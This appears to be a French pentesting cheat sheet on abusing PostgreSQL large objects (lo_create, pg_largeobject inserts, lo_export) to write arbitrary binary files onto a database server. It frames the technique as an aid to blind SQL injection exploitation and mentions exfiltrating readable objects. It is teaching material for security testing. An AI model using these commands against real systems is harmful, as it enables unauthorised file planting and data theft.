Big Binary Files Upload (PostgreSQL)

Objets volumineux PostgreSQL

PostgreSQL propose une structure appelée grands objets, accessible via la table pg_largeobject, conçue pour stocker des types de données volumineux, tels que des images ou des documents PDF. Cette approche est avantageuse par rapport à la fonction COPY TO car elle permet l'exportation des données vers le système de fichiers, garantissant une réplique exacte du fichier d'origine.

Pour stocker un fichier complet dans cette table, un objet doit être créé dans la table pg_largeobject (identifié par un LOID), suivi de l'insertion de morceaux de données, chacun de 2 Ko, dans cet objet. Il est crucial que ces morceaux fassent exactement 2 Ko (à l'exception éventuelle du dernier morceau) pour garantir le bon fonctionnement de la fonction d'exportation.

Pour diviser vos données binaires en morceaux de 2 Ko, les commandes suivantes peuvent être exécutées :

split -b 2048 your_file # Creates 2KB sized files

Pour encoder chaque fichier en Base64 ou en Hex, les commandes ci-dessous peuvent être utilisées :

base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line

Important : Lors de l'automatisation de ce processus, assurez-vous d'envoyer des morceaux de 2 Ko d'octets en texte clair. Les fichiers encodés en hexadécimal nécessiteront 4 Ko de données par morceau en raison du doublement de la taille, tandis que les fichiers encodés en Base64 suivent la formule ceil(n / 3) * 4.

Le contenu des grands objets peut être consulté à des fins de débogage en utilisant :

select loid, pageno, encode(data, 'escape') from pg_largeobject;

Utilisation de lo_creat & Base64

Pour stocker des données binaires, un LOID est d'abord créé :

SELECT lo_creat(-1);       -- Creates a new, empty large object
SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID

Dans les situations nécessitant un contrôle précis, comme l'exploitation d'une Injection SQL Aveugle, lo_create est préféré pour spécifier un LOID fixe.

Les morceaux de données peuvent ensuite être insérés comme suit:

INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));

Pour exporter et potentiellement supprimer l'objet volumineux après utilisation :

SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454);  -- Deletes the specified large object

Utilisation de lo_import & Hex

La fonction lo_import peut être utilisée pour créer et spécifier un LOID pour un grand objet :

select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);

Après la création de l'objet, les données sont insérées par page, en veillant à ce que chaque morceau ne dépasse pas 2 Ko :

update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;

Pour compléter le processus, les données sont exportées et le grand objet est supprimé :

select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454);  -- Deletes the specified large object

Limitations

Il est noté que les grands objets peuvent avoir des ACL (Listes de Contrôle d'Accès), restreignant potentiellement l'accès même aux objets créés par votre utilisateur. Cependant, les anciens objets avec des ACL permissives peuvent toujours être accessibles pour l'exfiltration de contenu.